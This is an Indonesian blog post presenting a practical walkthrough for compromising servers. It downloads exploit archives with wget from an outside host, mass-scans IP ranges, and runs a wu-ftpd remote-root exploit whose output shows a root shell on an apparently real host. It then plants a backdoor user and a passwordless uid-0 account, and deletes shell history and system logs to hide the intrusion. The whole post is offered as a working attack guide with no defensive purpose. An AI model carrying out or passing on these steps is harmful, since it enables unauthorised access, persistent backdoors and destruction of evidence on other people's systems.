Hacking Server Dari shell

Posted: Agustus 24, 2010 in TIPS & TRIK

Berikut ini saya paparkan bagaimana cara menghack suatu server dari shell.
lets…Try For Hack…

Langkah pertama, kita masuk dulu ke shell kita, setelah kita berada di shell kita, kita download doloe exploits itu.www.utay-doyan.cc/ftp.tgz – http://www.utay-doyan.cc/xpost.tgz.
Jadi di shell kita tinggal ketik wget http://www.utay-doyan.cc/ftp.tgz .
Setelah file udah selesai di download ketik tar -zxvf ftp.tgz .
Begitu juga dengan exploits xpost.tgz, cara compile nya sama dengan compile ftp.tgz seperti di atas. perlu di ingat paling tidak kita membuka dua session telnet or ssh . satu untuk exploits ftp satu session untuk xpost.
Nahh, abis itu kita tinggal masuk ke directory ftp ketik cd ftp otomatis kita udah ada di directory ftp, and di session satunya buat xpost kita ketik cd xpost . Setelah kita udah berada di directory xpost contoh ketik ./scan 202.1 tekan enter. Maksud dari ./scan 202.1 adalah kita men scan ip 202.1 sampai selesai, abis kita enter tinggal tunggu aja nanti akan ada keterangan seperti ini :

[iwek@jarada xwurm]$ ./scan 211.240
Wait for Scanning 211.240 (3-5 minutes for class B)
Scan Result:
——————————–
211.240.28.66
211.240.38.1
211.240.48.62
211.240.48.190
211.240.56.62
211.240.56.254
211.240.56.126
211.240.61.30
211.240.61.62
211.240.61.126
211.240.61.158
211.240.61.238
——————————–
Results logged in wu-scan.log
[iwek@jarada xwurm]$

nahh itu hasil dari scan nyah tadi. tinggal kita ketik ./masswu wu-scan.log tunggu aja doloe, nttar kalo ada keterangan You Have Root In 211.240.56.254 berarti kemungkinan besar kita dapet jebol itu server.

Abis itu di session telnet yang satu nya, yang udah siap di directory ftp, kita ketik ./awu 211.240.56.254 apabila ada keterangan seperti di bawah ini :

[iwek@jarada ftp]$ ./awu 211.240.56.254
Checking 211.218.149.47 for vulnerable wu-ftpd 2.x < 2.6.2: Ok
7350wurm – x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

# trying to log into 211.240.56.254 with (ftp/mozilla@) … connected.
# banner: 220 root.ivines.co.kr FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow

Yess.. Berarti kita udah masuk server itu. coba ketik whoami apabila keterangnnya di bawah root berarti kita udah dapet acces root.

Mo adduser ? nahh nttar ketik /usr/sbin/adduser ganjen -g wheel -s /bin/bash -d /home/ganjen tekan enter, abis itu buat password nyah ketik

passwd ganjen tekan enter , abis itu ketik kanjud tekan enter abis itu ketik lagi kanjud , nb: ketik kanjud dua kali itu kegunaan nya buat password kita

nahh apabila ada keterangan :

Changing password for user ganjen
passwd: all authentication tokens updated successfully

berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 -d /

abis itu ketik lagi

passwd -d crit

abis ketik itu kita otomatis udah dapet acces root

nahh semuanya udah selesai khan… jangan ampe lupa apus jejak supaya ga cepet matek shell nyahh… abis semuanya kelar kita udah add user udah dapet acces root nttar ketik :

cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

udah di ketik semua ? udahh… tekan ctrl d . udah deh … keluar khan… crottt… hiahaihaia mudah khan 🙂 nice to try. Buat exploits lain kamu bisa cari di site-site laen…

Iklan

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s